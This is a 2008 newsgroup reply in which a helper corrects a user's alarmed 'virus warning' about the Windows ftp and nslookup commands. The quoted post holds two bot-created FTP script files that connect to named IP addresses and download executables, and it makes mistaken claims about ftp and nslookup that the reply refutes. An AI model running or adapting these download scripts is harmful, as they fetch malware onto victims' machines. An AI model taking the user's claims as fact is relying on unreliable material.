Re: *** VIRUS WARNING!!! ***
- From: "David H. Lipman" <DLipman~nospam~@Verizon.Net>
- Date: Mon, 31 Mar 2008 20:49:48 -0400
From: "Terry Mester" <TerryMester@xxxxxxxxxxxxxxxxxxxxxxxxx>
| I have discovered how Spammers are able to access people's Computers to spew
| out their Spyware garbage, and it is Microsoft's OS which has made this
| possible! Spammers utilize two commands: the "nslookup" Command and the
| "ftp" Command found in c:\winnt\system32 -- which you can review in the
| Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
| Computer while logged onto the Internet to download a Virus. Those E-Mails
| you get from friends telling you to forward it on to others, in order to get
| good luck or money, are nothing but a SCAM perpetrated by the Spammers!
| DELETE those E-Mails -- DO NOT open them!!! Last month after separately
| opening two of those E-Mails, I ended up with a Virus on my Computer spewing
| out data over the Internet, and also the following two Text Files given the
| name "i" under the 'winnt' Directory.
| --- \winnt\i
| open 136.145.69.79 2755
| user 1 1
| get kp.exe
| quit
| --- \winnt\i
| open 208.111.5.228 2755
| user 1 1
| get 2k3.exe
| quit
| ---
| The Virus Commands I subsequently found under the 'winnt' or 'system32'
| Directories corresponded to the two ".exe" Files named in those two Text
| Files. I didn't know where those 4 Command Lines in those "i" Files were
| executable until just today when I looked up the "ftp" Command in Help.
| Those are 4 sub-commands which caused my Computer to open up the said IP
| Address and Port#, log in as the user 1 1, download the Virus Command, and
| then quit "ftp". Since I'm a Dial-up user, I immediately noticed something
| wrong because this immediately clogged up my Internet Connection. A High
| Speed user might not notice anything!
|
| It is unbelievable, but the "ftp" Command enables the Spammer to log onto
| your Computer WITHOUT using an ID and Password! Further, "ftp" enables the
| Spammer to prevent you from seeing what it is doing on your Computer!!! I'm
| not kidding! Further still, the "nslookup" Command enables the Spammer to
| find out your IP Numbers and Computer ID so that he can use the "ftp"
| Command! It is as if Microsoft specifically designed these two Commands to
| help Spammers! As far as I can tell, you cannot disable either of these
| Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to
| "nslookup.exe.rename" in order to make them non-executable, but I don't think
| this will solve the problem. Would a Microsoft Corporation technician please
| inform us if these two Command functions can be disabled? If not, Microsoft
| needs to IMMEDIATELY provide a Service Pack or update to enable these two
| functions to be disabled using the "net stop / start" Command. With these
| functions disabled, a Firewall Application becomes completely unnecessary!
This is NOT new an is well known in the anti malware community.
What you have decscribed is a BOT action. If it is on the PC, the PC is already infected.
The infector creates a script and uses the FTP command to download its peer software. A
batch file then uses the script to automate the FTP process.
If file protection is properly working, you can not rename FTP.EXE as it will just reinstate
itself.
NSLOOKUP has nothing to do with it.
What this shows is that you did not have anti virus installed and/or prioperly updated.
BTW: Microsoft is fully aware of the situation and I guarantee you that there will be no
patch because you have to be infected first before the FTP.EXE command will be used
maliciously. You shoud also know there are Trojans that hijack the BITS Service to download
peers.
--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
.
- Follow-Ups:
- Re: *** VIRUS WARNING!!! ***
- From: Terry Mester
- Re: *** VIRUS WARNING!!! ***
- Prev by Date: Re: missing pagefile.sys
- Next by Date: Re: *** VIRUS WARNING!!! ***
- Previous by thread: Re: missing pagefile.sys
- Next by thread: Re: *** VIRUS WARNING!!! ***
- Index(es):
Relevant Pages
|
